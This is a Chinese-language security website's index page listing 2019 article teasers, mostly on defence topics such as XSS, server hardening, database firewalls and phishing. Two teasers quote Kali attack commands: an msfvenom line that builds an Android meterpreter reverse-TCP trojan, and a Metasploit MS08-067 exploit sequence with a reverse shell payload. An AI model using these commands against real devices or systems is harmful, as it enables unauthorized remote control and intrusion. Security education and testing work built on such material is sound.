首页 网络安全

网络安全

  • 跨站脚本攻击(XSS)
    概念:通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,实现控制用户浏览器行为的一种攻击方式。全称:Cross Site Script(本来缩写是CSS,但是为了和层叠样式表CSS有所区别,所以在安全领域叫做“XSS”)危害:盗取用户信息、篡改页面钓鱼、制造蠕虫等。XSS分类:存 ...
    网站防护 2019-7-1 12:40 1323
  • Kali Linux实战篇:使用Msfvenom生成木马实现远程控制安卓手机
    声明:本头条号【Kali技术】所有分享,仅限学习交流!请勿他用!先看Kali的ip,我的是192.168.0.101然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R /root/apk.apk这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功 只有9K多 ...
    渗透测试 2019-7-1 12:39 5618
  • 开发者必读篇之Web漏洞防护指南
    web的发展史早期的互联网非常的单调,一般只有静态页面,现在,随着技术的发展,web上大多数站点实际上是web应用程序,在服务器和浏览器之间进行双向的信息传递。他们支持注册登录,金融交易,搜索及用 ...
    网站防护 2019-6-29 13:42 1320
  • Kali Linux渗透测试篇:Metasploit渗透测试框架使用篇
    Metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。他们或许在渗透测试中的每一方面都不能称为最好用的工具,但组合起来的框架却让它变得强大。1.启动服务:在kali中使用metasploit, ...
    渗透测试 2019-6-29 13:41 2777
  • WiFi探针获取无线网络信息技术简介与测试
    随着科学技术的快速发展,WiFi已经逐渐遍布到各个家庭和公共场所,但其中的问题也层出不穷。黑客可将个人热点伪装成免费WiFi吸引他人连接从而获取账号密码,今年曝光的WiFi探针技术,甚至无需用户主动连接WiFi即可捕 ...
    安全运维 2019-6-28 18:09 2312
  • 「网络安全」服务器安全加固系统
    网络中的各种服务器,如WEB服务器、FTP服务器、E-mail服务器,是黑客攻击的重点目标,其安全性至关重要。虽然通过路由器的包过滤和防火墙的访问控制,大大增加了安全性,但是黑客还是可以利用服务器的漏洞或配置错误进行攻击,以图获取系统控制权或实现拒绝服务攻击。什么是服务器安全加固?服务器系统 ...
    安全学院 2019-6-27 13:22 2386
  • 超简单数据库加密防止数据泄露
    数据泄露和暴露如今已非常普遍,很难跟踪所有的泄露事件,更难有时间仔细考虑周全的解决方案。但或许是出于必要性考虑,数据库巨头 MongoDB 花费两年时间开发出一套全新的数据库加密机制,直接指向减少这些破坏性事 ...
    安全运维 2019-6-26 17:37 2070
  • 这7本O’Reilly推出的免费网络安全电子书,够你看了
    《Cracking Security Misconceptions》随着有关组织和政府部门的安全漏洞示例越来越多,网络安全备受关注,在本书中,专业安全人员Andrew Peterson解释了几个关于黑客攻击世界的普遍误解,以便你更好的进入这个领域
    安全学院 2019-6-25 12:22 946
  • Kali Linux渗透测试篇:Metasploit不同应用场景使用教程
    1.远程代码执行 msfconsole search 08-067 use exploit/windows/smb/ms08_067_netapi show options set RHOST IP show payloads set payload windows/meterpreter/reverse_tcp show options set LHOST ip info(查看影响版本) 用nmap查看目标服务器版本 set target 编号 show options(检查是否已经设置 ...
    渗透测试 2019-6-25 12:16 2244
  • 如今,越来越多的数据和应用程序正在向云端移动,这为组织带来了独特的信息安全挑战。很多组织在使用云服务时将面临12个主要的安全威胁。云计算继续改变组织使用、存储和共享数据、应用程序和工作负载的方式。它还带来了一系列新的安全威胁和挑战。随着如此多的数据进入云端,特别是进入公共云服务,这 ...
    安全学院 2019-6-23 12:00 627
  • 五分钟了解数据库防火墙应具备哪些能力
    互联网时代,由数据库引发的安全事件越来越多,数据库防火墙作为保护数据库安全必不可少的防御工事,也越来越受到企业关注。那么数据库防火墙究竟应该具备哪些能力,才能为企业数据资产筑起坚不可摧的安全防线?美创 ...
    安全运维 2019-6-21 17:39 1658
  • 安全开发你必须使用的28个DevSecOps工具
    将安全融入开发过程,更早捕获并修复应用漏洞,你需要这五类共28款DevSecOps工具。DevSecOps是将安全集成到整个应用开发周期的过程,是从内到外强化应用,使其能够抵御各种潜在威胁的理想方式。因为很多公司企业不断开发应用以满足客户和商业合作伙伴的需求,DevSecOps的吸引力也与日俱增。敏捷开发方 ...
    安全学院 2019-6-21 13:07 928
  • 2019年后半年准备实施信息安全等级保护2.0,对等级保护2.0,对于信息机房提了不少需求,所以作为医院运维人员来说,我们也深深感受到信息安全重要性,我看了技术要求,也提出几点自己看法。在跟进传统机房建设过程中,从等级保护1.0到现在2.0来看,国家对新生大数据,云计算提了不少要 ...
    安全学院 2019-6-19 11:39 759
  • 本期推荐18本黑客书籍!如何保护自己免受常见的黑客攻击?
    《Hacking》这本初学者指南着重让你了解黑客是如何工作的以及如何保护自己免受常见的黑客攻击。本书中还包含了黑客所使用的工具和技术。向你展示了如何在你的系统上发现攻击,以便尽可能减少任何潜在的损害。2、《Hacking: The Art of Exploitation》这本书可能是有史以来最好的黑 ...
    安全学院 2019-6-17 15:55 1060
  • 12个最昂贵的网络钓鱼攻击示例
    网络钓鱼是对您的企业最恶毒和最危险的威胁之一 - 无论您是大型企业,小型企业还是中间企业。最成功的网络钓鱼攻击示例通常涉及不同社交工程策略的组合,可能涉及模仿CEOS或公司高管,政府组织,慈善机构,供应商和业务合作伙伴。在某种程度上,每个人都容易受到网络钓鱼诈骗的影响,因为他们会掠夺个 ...
    安全学院 2019-6-15 11:25 1790
返回顶部